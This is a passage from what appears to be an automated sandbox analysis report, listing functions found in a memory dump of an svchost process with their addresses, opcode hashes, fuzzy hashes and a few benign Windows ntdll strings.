                                                                      • Instruction Fuzzy Hash: A6900225222404031105F6580744547004787D5351395C021F2015558CD72189A15121
                                                                      Function 03272F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c74eec372dbece9bc8debe5ccae24cf344253fa3be09e440b1a843406d795a4e
                                                                      • Instruction ID: 873e47495b97d91af09b258eaf27379c045c443aac763415d8af2b97f7ecddf9
                                                                      • Opcode Fuzzy Hash: c74eec372dbece9bc8debe5ccae24cf344253fa3be09e440b1a843406d795a4e
                                                                      • Instruction Fuzzy Hash: 2A90026135240842E100B2584454B460006C7E1301F95C015E206455CD8719CD926126
                                                                      Function 03272F60 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bf7517501b6cbf6555a1b31d4101ff2a5edcb75092bc31c176a60626395876e
                                                                      • Instruction ID: 07f6c78858d55dd02bc3bc35a074a656ec6f5b8c4faadd20c5bd1cb9c0d8a617
                                                                      • Opcode Fuzzy Hash: 5bf7517501b6cbf6555a1b31d4101ff2a5edcb75092bc31c176a60626395876e
                                                                      • Instruction Fuzzy Hash: BE90026122240442E104B2584444746004687E1301F95C012A315455CCC6298DA15125
                                                                      Function 03272FA0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c11290c255c7d6e546c41371d240ebd6a1b74ce998d9a39ee07d2ddcc1e7d57d
                                                                      • Instruction ID: 7fadb57c10aa573213c1979dd3be6130ee31c56b678b90e44603402477907edd
                                                                      • Opcode Fuzzy Hash: c11290c255c7d6e546c41371d240ebd6a1b74ce998d9a39ee07d2ddcc1e7d57d
                                                                      • Instruction Fuzzy Hash: 1990023121280802E100B2584848787000687D0302F95C011A616455DE8765C9D16531
                                                                      Function 03272FB0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d643031ec8b2cdb0bc93a02b7c38e1e0167fa36444c27c23e8aa4cbaad493b1
                                                                      • Instruction ID: 3c7a80b5ede86109967752dc95b99ade5a9fe777300bab2caeca7a809f0fb3f5
                                                                      • Opcode Fuzzy Hash: 4d643031ec8b2cdb0bc93a02b7c38e1e0167fa36444c27c23e8aa4cbaad493b1
                                                                      • Instruction Fuzzy Hash: 9C900221612404425140B26888849464006ABE1311795C121A1998558D865989A55665
                                                                      Function 03272F90 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 064e675ef9ed47abe524adc83ad72984d82c6468d3ffaffe338a3ec33a8b9c1a
                                                                      • Instruction ID: 4ee841a18505364bc4779aa6e53250b00003983a91eb7d2168394b694972cd4b
                                                                      • Opcode Fuzzy Hash: 064e675ef9ed47abe524adc83ad72984d82c6468d3ffaffe338a3ec33a8b9c1a
                                                                      • Instruction Fuzzy Hash: C790023121280802E100B258485474B000687D0302F95C011A216455DD872589916571
                                                                      Function 03272FE0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0aea9af54a3976220a7383dc598de9daa71585c0121524161018005ded10112c
                                                                      • Instruction ID: c47ebbd53c4819a479da1ad0dd3b8374de93ea03345420332e16ba08fa650c09
                                                                      • Opcode Fuzzy Hash: 0aea9af54a3976220a7383dc598de9daa71585c0121524161018005ded10112c
                                                                      • Instruction Fuzzy Hash: 51900221222C0442E200B6684C54B47000687D0303F95C115A115455CCCA1589A15521
                                                                      Function 03272E30 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0a854a148c51a6415361c851739c1cca893670a771226e71691ef295b000ec0e
                                                                      • Instruction ID: c173a74e2befc2fe1ab842000eb8e2bc9d5b5b4127d4a18aca43c9e9efb20bbd
                                                                      • Opcode Fuzzy Hash: 0a854a148c51a6415361c851739c1cca893670a771226e71691ef295b000ec0e
                                                                      • Instruction Fuzzy Hash: 3F90022131240802E102B2584454646000AC7D1345FD5C012E242455DD87258A93A132
                                                                      Function 03272EA0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fe8e58985dca6ba5d94fcb71b8a727a36b53f5d138c6ffdf1cfc46f807db65a9
                                                                      • Instruction ID: 20611e4d67632d7dbfe9227979a89c1fecb0d633ac3df7136c406726947e3310
                                                                      • Opcode Fuzzy Hash: fe8e58985dca6ba5d94fcb71b8a727a36b53f5d138c6ffdf1cfc46f807db65a9
                                                                      • Instruction Fuzzy Hash: BC90027121240802E140B2584444786000687D0301F95C011A606455CE87598ED56665
                                                                      Function 03272E80 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 467b1a68dd167b5fe9940bfffd6f999b07f4656a7587b30bee87d0c00e4cc6f1
                                                                      • Instruction ID: 331bd83b2664cff092dcb64dd8bc19dd3822dfb34e38af495323c7032d93287c
                                                                      • Opcode Fuzzy Hash: 467b1a68dd167b5fe9940bfffd6f999b07f4656a7587b30bee87d0c00e4cc6f1
                                                                      • Instruction Fuzzy Hash: B790022161240902E101B2584444656000B87D0341FD5C022A202455DECB258AD2A131
                                                                      Function 03272EE0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e9ce60765bf8d9a20b3731140be71d26f50fe79a183535af5c5d0bf6317e9070
                                                                      • Instruction ID: 62d61ec15d13db521f2baf696dd9e3914100c729e1d10833c5567c51b00e1fee
                                                                      • Opcode Fuzzy Hash: e9ce60765bf8d9a20b3731140be71d26f50fe79a183535af5c5d0bf6317e9070
                                                                      • Instruction Fuzzy Hash: BA90026121280803E140B6584844647000687D0302F95C011A306455DE8B298D916135
                                                                      Function 03272D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6060a5b7faf4674d83fbfeade4d0def172df7df31bef505a3c9cf71b1089a620
                                                                      • Instruction ID: 2376e335e1f187b4350137f94e9293b207312bed05f4563f6d23544bbf2c2351
                                                                      • Opcode Fuzzy Hash: 6060a5b7faf4674d83fbfeade4d0def172df7df31bef505a3c9cf71b1089a620
                                                                      • Instruction Fuzzy Hash: C590022131240403E140B25854586464006D7E1301F95D011E141455CCDA1589965222
                                                                      Function 03272D00 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dc67db42f9336f1dae99cf9078117d4300c69ebe2448794f46cb1a53718dde09
                                                                      • Instruction ID: a4b129d371484fd1a48b036ce0dd7e328060f86c9cfb737f721be76114ba482d
                                                                      • Opcode Fuzzy Hash: dc67db42f9336f1dae99cf9078117d4300c69ebe2448794f46cb1a53718dde09
                                                                      • Instruction Fuzzy Hash: 9B90022121644842E100B6585448A46000687D0305F95D011A206459DDC7358991A131
                                                                      Function 03272D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8be82e647302789dc6a0fec914aca8f12a0126e4d1c45b1077c5654aa6c158b
                                                                      • Instruction ID: 7b7f10e9e739d4761e69c567290b65dfec8a5744cc5f62991fc1ce9598ad6ef3
                                                                      • Opcode Fuzzy Hash: d8be82e647302789dc6a0fec914aca8f12a0126e4d1c45b1077c5654aa6c158b
                                                                      • Instruction Fuzzy Hash: 7D90022922340402E180B258544864A000687D1302FD5D415A101555CCCA1589A95321
                                                                      Function 03272DB0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8e58ba20026eac1b83439d5d9b8f4b0c39937aca1bac26dbc4807e264d531b02
                                                                      • Instruction ID: 70e3fd17ffe6c7f6e9d536d8e4fe87935b52438c9a68b74b610688df30d59cb5
                                                                      • Opcode Fuzzy Hash: 8e58ba20026eac1b83439d5d9b8f4b0c39937aca1bac26dbc4807e264d531b02
                                                                      • Instruction Fuzzy Hash: C190023125240802E141B2584444646000A97D0341FD5C012A142455CE87558B96AA61
                                                                      Function 03272DD0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f1db30c4d798610f48770e3cc442b748209807bca7a1c9378a7904b0b4bff614
                                                                      • Instruction ID: 465edfae94fc2cf18ca0407c5a1635ff4812c2e135fd733b082e809e65fb2f69
                                                                      • Opcode Fuzzy Hash: f1db30c4d798610f48770e3cc442b748209807bca7a1c9378a7904b0b4bff614
                                                                      • Instruction Fuzzy Hash: 7D900221253445526545F2584444547400797E03417D5C012A2414958C86269996D621
                                                                      Function 03272C60 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0481ea74049fb896fde31f96817b64768b1d8d05ace1ad6539e47e5253c6c625
                                                                      • Instruction ID: ea823bd71f6fac6b700639654bc3c90224e0d158e893e6197181927e5a3610b9
                                                                      • Opcode Fuzzy Hash: 0481ea74049fb896fde31f96817b64768b1d8d05ace1ad6539e47e5253c6c625
                                                                      • Instruction Fuzzy Hash: 8190023121240C42E100B2584444B86000687E0301F95C016A112465CD8715C9917521
                                                                      Function 03272CA0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea6db88fe10fbcd71bc28a7346cc602cda4a04e53baade636e4b72411cc81879
                                                                      • Instruction ID: 231de5b90175183074efa9f55eb90d3efc736cd6d20a6776324fa4bbfcc47fa5
                                                                      • Opcode Fuzzy Hash: ea6db88fe10fbcd71bc28a7346cc602cda4a04e53baade636e4b72411cc81879
                                                                      • Instruction Fuzzy Hash: EA90023121240802E100B6985448686000687E0301F95D011A602455DEC76589D16131
                                                                      Function 03272CF0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2ff0fae5997e20b29a3b958968149607751b103401add5069af918fdf1ffa5ca
                                                                      • Instruction ID: 9328f2d54f61e1075992c330148f84a325afdc39b6ed3ab225f93c040cdab384
                                                                      • Opcode Fuzzy Hash: 2ff0fae5997e20b29a3b958968149607751b103401add5069af918fdf1ffa5ca
                                                                      • Instruction Fuzzy Hash: 2F90023121240803E100B2585548747000687D0301F95D411A142455CDD75689916121
                                                                      Function 03272CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a8d86bb1e4140ca3030405fbce269b7be21290039f3b191106e1f209ba1e1959
                                                                      • Instruction ID: 58b2041be9d331f3bb111dd8a824763c3e2004e816cdb90095b5de1b838f0b06
                                                                      • Opcode Fuzzy Hash: a8d86bb1e4140ca3030405fbce269b7be21290039f3b191106e1f209ba1e1959
                                                                      • Instruction Fuzzy Hash: 9C90022161640802E140B2585458746001687D0301F95D011A102455CDC7598B9566A1
                                                                      Function 03273010 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 812e1232c8ca1a95e6905f0da65733dd34ec170530659caed6e27c48560ee140
                                                                      • Instruction ID: fa55d6c7669637396b09e0f5362acac3026daf165a834f230aa773b60e0e0fdc
                                                                      • Opcode Fuzzy Hash: 812e1232c8ca1a95e6905f0da65733dd34ec170530659caed6e27c48560ee140
                                                                      • Instruction Fuzzy Hash: E590022121284842E140B3584844B4F410687E1302FD5C019A515655CCCA1589955721
                                                                      Function 03273090 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b101d3da0a3ffa37f6626541fae7b10732ec3b5985a02858ebb4532bd31ca618
                                                                      • Instruction ID: 0f229c6b5cecdcdf17726ab7385c0f94356db6b311f9a98996215ecffa47e17c
                                                                      • Opcode Fuzzy Hash: b101d3da0a3ffa37f6626541fae7b10732ec3b5985a02858ebb4532bd31ca618
                                                                      • Instruction Fuzzy Hash: 4B90022125240C02E140B25884547470007C7D0701F95C011A102455CD87168AA566B1
                                                                      Function 032739B0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41bf5597ebd754c665548ee6d40be457c23777f6bd7acd3e88186a4c6c8085e6
                                                                      • Instruction ID: c7f44bb53faed3a815c51cc8f18f3bbff9e17cecc4a90fdee1632d959b480667
                                                                      • Opcode Fuzzy Hash: 41bf5597ebd754c665548ee6d40be457c23777f6bd7acd3e88186a4c6c8085e6
                                                                      • Instruction Fuzzy Hash: F390022125645502E150B25C44446564006A7E0301F95C021A181459CD865589956221
                                                                      Function 03273D10 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fe688b6d143a204cf462fa51886b83a311c6d8a1e1cc2de9dc082364698ba2b
                                                                      • Instruction ID: 2b6471becfb57ec55c5ef4c026b80e61c84892f9eaeab654927c97d992275b70
                                                                      • Opcode Fuzzy Hash: 0fe688b6d143a204cf462fa51886b83a311c6d8a1e1cc2de9dc082364698ba2b
                                                                      • Instruction Fuzzy Hash: B990023121340542A540B3585844A8E410687E1302BD5D415A101555CCCA1489A15221
                                                                      Function 03273D70 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ebb05a5210cd0a919404ab300aa71ab3c06881d1df48ff2ffdb54feb0a61d8fa
                                                                      • Instruction ID: 592ae4ba8f6ff67eebbf58e8fb9468f42b7137623c7149cf6b6e07d4edfe9380
                                                                      • Opcode Fuzzy Hash: ebb05a5210cd0a919404ab300aa71ab3c06881d1df48ff2ffdb54feb0a61d8fa
                                                                      • Instruction Fuzzy Hash: 2890023521240802E510B2585844686004787D0301F95D411A142455CD875489E1A121
                                                                      Function 03272C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: 9aeb784750170df4d46d131ccac2f7d8f75cf40f13a631d739980b1b2c4b452e
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Function 03272890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: f0c3976081319ee4e2a26ce1f124ac75d00297a1ee97ac2a95d57698c0fa170b
                                                                      • Instruction ID: a54dc0921717355e43369596efffd9a26ace6ef8b88aa23541d0afa79a63cd6a
                                                                      • Opcode Fuzzy Hash: f0c3976081319ee4e2a26ce1f124ac75d00297a1ee97ac2a95d57698c0fa170b
                                                                      • Instruction Fuzzy Hash: 0D51B8B5A24617FFCB10DB9C889097EF7B8BF082007288569E4A5D7641D274DEC4CBE0
                                                                      Function 032E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: f2e111513c44f1a2f8544bd4da3404cbf9ffc3ca9dc8e8c2cc010a7f8b26eb9a
                                                                      • Instruction ID: 01f8d34d66b1f8fff7f492f34826512f23621204787e03dc1b3ec911c4e9a2c4
                                                                      • Opcode Fuzzy Hash: f2e111513c44f1a2f8544bd4da3404cbf9ffc3ca9dc8e8c2cc010a7f8b26eb9a
                                                                      • Instruction Fuzzy Hash: 77512975A20756EECB24EF5CCD9187FB7FCEB44200B848859E4A7CB641D7B4EA808760
                                                                      Function 03267630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 032A4787
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032A46FC
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 032A4725
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 032A4742
                                                                      • Execute=1, xrefs: 032A4713
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 032A4655
                                                                      • ExecuteOptions, xrefs: 032A46A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      • Opcode ID: ae0ccc136d29bc4c7cbdbfef11c42d1e4d4561490d920328c4016e6480bb60b6
                                                                      • Instruction ID: 7926886763741e7b1a912c78a45c1410ee1a83f6d1cd1e514d03949a42215fa9
                                                                      • Opcode Fuzzy Hash: ae0ccc136d29bc4c7cbdbfef11c42d1e4d4561490d920328c4016e6480bb60b6
                                                                      • Instruction Fuzzy Hash: A6510B35620319BBDF11EA6DED85FAE73BCAF14308F0400E9D605AB191D7B0AAD58F50
                                                                      Function 03306940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                      • Instruction ID: be723cca41009f3c3d40d364d636538b84c4fc5d329332f2bbc1160ea7538bbc
                                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                      • Instruction Fuzzy Hash: AE0223B5508341AFC304DF18C9A1A6BBBE5FFC8700F04892DB9899B2A4DB71E945CB52
                                                                      Function 0327B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 1302938615-699404926
                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction ID: e001e4af4ef18d5b9ee414c5d0a0b86d8fe5d5049356b6a5cabcf73d164bc066
                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction Fuzzy Hash: AF81D175E2524A9EDF28CE68C8917FEBBB5BF45310F1C425AD861AB390C77498C0CB54
                                                                      Function 032E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
